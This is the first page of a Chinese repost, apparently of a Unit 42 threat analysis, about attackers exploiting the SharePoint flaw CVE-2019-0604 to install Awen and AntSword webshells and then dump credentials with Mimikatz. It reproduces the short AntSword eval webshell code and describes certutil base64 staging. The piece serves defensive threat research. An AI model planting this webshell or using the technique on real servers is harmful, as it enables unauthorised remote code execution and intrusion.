欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

攻击者仍在利用SharePoint的漏洞展开大规模攻击

来源:本站整理 作者:佚名 时间:2020-03-12 TAG: 我要投稿


早在2019年9月10日,unit42就观察到有攻击者利用CVE-2019-0604中描述的SharePoint漏洞在一个中东政府组织的网站上安装了几个webshell,其中一个webshell是开源的AntSword webshell。
在2020年1月10日,unit42使用Shodan搜索Internet可访问的服务器,这些服务器运行的SharePoint版本还是容易受到CVE-2019-0604的攻击。虽然,SharePoint在HTTP响应中提供的版本号并不总是提供准确的SharePoint版本号,但unit42决定使用它来检查它是否小于Microsoft advisory中修补过的SharePoint版本号。unit42进行比较,发现有28881台服务器在使用SharePoint的漏洞版本。unit42没有主动检查每台服务器,以验证它们是否确实容易受到攻击,因此,许多这些面向公众的SharePoint服务器可能并不容易受到攻击,或者自从打了补丁以后就没有。无论如何,服务器的绝对数量和公开可用的攻击代码表明CVE-2019-0604仍然是一个主要的攻击媒介。
通过使用这个webshell集合,攻击者通过使用臭名昭著的Mimikatz工具的变体来转储凭证,并使用Impacket的atexec工具来使用转储凭证在其他系统上运行命令,从而横向干扰网络上的其他系统。在2019年9月19日,unit42观察到类似的Mimikatz变种上传到另一个政府组织的webshell上,该组织位于中东。上传到这两个组织的Mimikatz变体是惟一的,因为它涉及到一个用. net编写的自定义加载器应用程序。因此,unit42认为,这两次入侵背后的威胁组织是相同的。
早在2019年4月,unit42就首次观察到有攻击组织利用CVE-2019-0604在两个中东国家的政府机构的SharePoint服务器上安装webshell。目前有多个攻击组织正在利用这一漏洞利用SharePoint服务器,以获得对目标网络的初始访问权。
利用CVE-2019-0604
在2019年9月10日,unit42观察到以下URL的HTTP POST请求,unit42认为这是在面向公众的SharePoint服务器(T1190)中利用CVE-2019-0604的:
/ _layouts / 15 / picker.aspx
unit42无法访问上述HTTP POST请求中发送的数据,但是,unit42观察到在入站请求时在SharePoint服务器上执行以下命令:

上面的命令使用echo命令将大量base64编码的数据写入名为cmd.txt的文本文件,然后,该命令使用certutil应用程序将cmd.txt文件中的base64编码数据(T1132)转换为三个不同的SharePoint相关文件夹中的c.aspx。整个命令的结果将Awen asp.net webshell (T1100)的一个变体保存到SharePoint服务器,以进一步与入侵服务器进行交互。利用此SharePoint漏洞进行部署的Awen Webshell的SHA256哈希值为5d4628d4dd89f31236f8c56686925cbb1a9b4832f81c95a4300e64948afede21。
攻击者的Awen Webshell
在怀疑使用了CVE-2019-0604之后仅40秒,unit42在c.aspx上观察到对Webshell的第一个HTTP GET请求,这是可免费获得的awen asp.net Webshell的修改版本。unit42认为这个HTTP GET请求是在开发之后和执行命令之前访问webshell的攻击者。图1显示了Awen Webshell,除了设置命令提示符应用程序的路径和运行命令之外,它几乎没有其他功能。

利用CVE-2019-0604之后由攻击者安装的Awen webshell
攻击者使用图1中所示的Awen Web Shell运行各种命令以在系统和网络上进行初始发现,包括用户帐户(T1033和T1087),文件和文件夹(T1083),特权组(T1069),远程系统( T1018)和网络配置(T1016)。下表1不仅显示了用于发现的命令,还显示了用于使用echo命令将base64编码的数据写入a.txt并使用certutil应用程序解码并保存到bitreeview.aspx的将另一个Web Shell部署到服务器的命令。表1还显示了使用Awen Webshell执行的命令之间的时间差,以深入了解此攻击者执行命令的速度。

利用CVE-2019-0604后,攻击者安装的Awen webshell
名为bitreeview.aspx的webshell已保存到SharePoint服务器安装路径内的文件夹中。 bitreeview.aspx文件是AntSword Webshell的变体。安装此AntSword Webshell之后,攻击者不再使用Awen Webshell,而是在向Awen Webshell发出最后一条命令后的35秒内向AntSword发出第一个命令。
攻击者的AntSword Webshell
AntSword是一个模块化Webshell,涉及一个非常简单的Webshell,攻击者可以将其部署到受感染的服务器和称为AntSword Shell Manager的客户端应用程序。客户端应用程序的使用不同于攻击者在浏览器窗口中与之交互的许多其他Webshell。当Shell Manager将适当的脚本发送到将执行以执行所需操作的Webshell时,攻击者将使用AntSword Shell Manager与受感染服务器上的AntSword Webshell进行交互。为了了解Webshell本身的功能受限,在此攻击中部署的bitreeview.aspx AntSword Webshell(SHA256:15ecb6ac6c637b58b2114e6b21b5b18b0c9f5341ee74b428b70e17e64b7da55e)仅162个字节,并且包含以下内容:
%@ Page Language="Jscript"%
%
eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.
FromBase64String(Request.Item["Darr1R1ng"])),"unsafe"); %
从上面的代码中可以看到,AntSword Webshell除了运行AntSword Shell Manager提供的脚本外没有其他功能,特别是在HTTP POST请求的名为Darr1R1ng的字段中。上面的代码还告诉unit42,攻击者已经在AntSword ShellManager中创建了自己的自定义“编码器”,以便能够与上面的代码进行交互。

[1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载